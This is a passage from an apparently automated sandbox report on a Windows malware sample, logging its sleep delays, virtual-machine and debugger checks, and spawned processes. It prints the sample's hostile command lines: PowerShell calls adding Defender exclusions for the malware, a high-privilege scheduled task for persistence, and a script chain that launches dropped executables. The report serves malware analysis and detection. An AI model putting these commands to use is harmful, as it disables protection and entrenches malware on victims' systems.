                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596200s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596092s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595984s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595875s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595764s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595656s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595547s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595437s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595218s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595109s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594890s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594781s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594672s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594562s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594450s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 7073 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 2531 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 7747 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 1897 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 6372Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 1552Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXE TID: 2500Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 5176Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 5404Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe TID: 7448Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Program Files\Windows Mail\System.exeLast function: Thread delayed
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Update.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,24_2_00C6A69B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,24_2_00C7C220
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8B348 FindFirstFileExA,24_2_00C8B348
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7E6A3 VirtualQuery,GetSystemInfo,24_2_00C7E6A3
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 600000
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599703
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599540
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599437
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599328
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599204
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599078
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598968
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598859
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598750
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598640
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598531
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598422
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598297
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598187
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598078
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597968
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597859
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597750
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597640
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597531
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597421
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597311
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597134
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597031
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596884
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596760
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596436
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596312
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596200
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596092
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595984
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595875
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595764
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595656
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595547
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595437
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595328
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595218
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595109
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595000
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594890
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594781
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594672
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594562
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594450
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: rqbprm.exe, 00000018.00000003.2094512247.0000000002F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\x
                                    Source: portBrowserweb.exe, 00000021.00000002.2688477004.000000001B91A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: wscript.exe, 0000001B.00000003.2338038912.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: portBrowserweb.exe, 00000021.00000002.2674990748.000000001B260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: HaLCYOFjMN.exeBinary or memory string: vmware
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                                    Source: System.exe.33.drBinary or memory string: Nk17AyvmcI
                                    Source: wscript.exe, 0000001B.00000003.2338038912.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: svchost.exe, 0000001C.00000002.2729863986.0000027FE3A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2732224060.0000027FE904C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDefi
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeAPI call chain: ExitProcess graph end nodegraph_24-25153
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information queried: ProcessInformation

                                    Anti Debugging

                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC4777C1 CheckRemoteDebuggerPresent,5_2_00007FFAAC4777C1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00C7F838
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C87DEE mov eax, dword ptr fs:[00000030h]24_2_00C87DEE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8C030 GetProcessHeap,24_2_00C8C030
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess token adjusted: Debug
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows Mail\System.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F9D5 SetUnhandledExceptionFilter,24_2_00C7F9D5
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00C7FBCA
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00C88EBD
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\rqbprm.exe "C:\Users\user\AppData\Local\Temp\rqbprm.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE "C:\Users\user\AppData\Local\Temp\cnvwov.EXE"
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentwebreviewDhcp\portBrowserweb.exe "C:\agentwebreviewDhcp/portBrowserweb.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow

                                    Language, Device and Operating System Detection

                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F654 cpuid 24_2_00C7F654
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: GetLocaleInfoW,GetNumberFormatW,24_2_00C7AF0F
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeQueries volume information: C:\Users\user\Desktop\HaLCYOFjMN.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
